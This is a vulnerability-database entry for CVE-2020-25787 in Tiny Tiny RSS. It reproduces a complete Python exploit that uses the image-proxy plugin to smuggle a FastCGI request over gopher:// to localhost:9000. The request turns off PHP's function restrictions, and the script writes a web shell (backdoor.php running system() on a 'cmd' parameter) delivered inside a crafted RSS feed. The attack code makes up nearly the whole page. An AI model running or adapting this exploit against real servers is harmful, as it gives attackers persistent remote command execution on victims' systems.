TinyTinyRSS Remote Code Execution

🗓️ 02 Mar 2021 00:00:00Reported by Benjamin NadarevicType

packetstorm🔗 packetstormsecurity.com👁 219 Views

TinyTinyRSS Remote Code Execution, Exploit with public date 21 Sep 202

Reporter	Title	Published	Views	Family All 18
0day.today	Tiny Tiny RSS - Remote Code Execution Exploit	2 Mar 202100:00	–	zdt
FreeBSD	tt-rss -- multiple vulnerabilities	15 Sep 202000:00	–	freebsd
Circl	CVE-2020-25787	31 Dec 202019:27	–	circl
Check Point Advisories	Tiny Tiny RSS Remote Code Execution (CVE-2020-25787)	5 Apr 202100:00	–	checkpoint_advisories
CVE	CVE-2020-25787	19 Sep 202020:18	–	cve
Cvelist	CVE-2020-25787	19 Sep 202020:18	–	cvelist
Debian CVE	CVE-2020-25787	19 Sep 202020:18	–	debiancve
Exploit DB	Tiny Tiny RSS - Remote Code Execution	2 Mar 202100:00	–	exploitdb
Tenable Nessus	FreeBSD : tt-rss -- multiple vulnerabilities (2eec1e85-faf3-11ea-8ac0-4437e6ad11c4)	1 Oct 202000:00	–	nessus
Tenable Nessus	Linux Distros Unpatched Vulnerability : CVE-2020-25787	27 Aug 202500:00	–	nessus

`#!/usr/bin/env python3  
# Exploit Title: TinyTinyRSS remote code execution  
# Date: 21 September 2020 made public  
# Exploit Author: Daniel Neagaru & Benjamin Nadarević  
# Blog post: https://www.digeex.de/blog/tinytinyrss/  
# Software Link: https://git.tt-rss.org/fox/tt-rss  
# Version: all before 2020-09-16  
# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef  
# Tested on: default docker installation method  
# CVE : CVE-2020-25787  
  
  
  
from sys import argv  
import urllib.parse as ul  
import base64  
  
  
def CustomFcgi( filename, output, backdoor):  
length=len(output)+len(backdoor)+64  
char=chr(length)  
  
data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length)))  
data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"  
data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/"  
  
temp1 = chr(len(data) // 256)  
temp2 = chr(len(data) % 256)  
temp3 = chr(len(data) % 8)  
  
end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00"  
end += "<?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>\x00\x00\x00\x00"  
start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00"  
  
payload = start + data + end  
def get_payload(payload):  
finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/")  
return finalpayload  
  
return "gopher://localhost:9000/_"+get_payload(get_payload(payload))  
  
  
  
TTRSS_PATH = "/var/www/html/tt-rss/"  
BACKDOOR_CODE = """  
<?php  
echo "success\n";  
echo system($_GET['cmd']);  
?>  
"""  
  
  
feed_file = open("malicious_RCE_feed.xml",'w')  
filename = TTRSS_PATH + "config.php"  
output = TTRSS_PATH + "backdoor.php"  
  
backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii"))  
rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text"  
  
feed ="""<?xml version="1.0" encoding="UTF-8" ?>  
<rss version="2.0">  
  
<channel>  
<title>Exploit demo - rce</title>  
<link></link>  
<description>You are getting infected :(</description>  
<item>  
<title> Check if there is backdoor.php</title>  
<link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link>  
<description>  
<![CDATA[  
Dummy text  
  
<img src="{}">  
  
]]>  
</description>  
</item>  
</channel>  
</rss>  
""".format(rce)  
  
feed_file.write(feed)  
feed_file.close()  
`

02 Mar 2021 00:00Current

9.6High risk

Vulners AI Score9.6

EPSS0.15535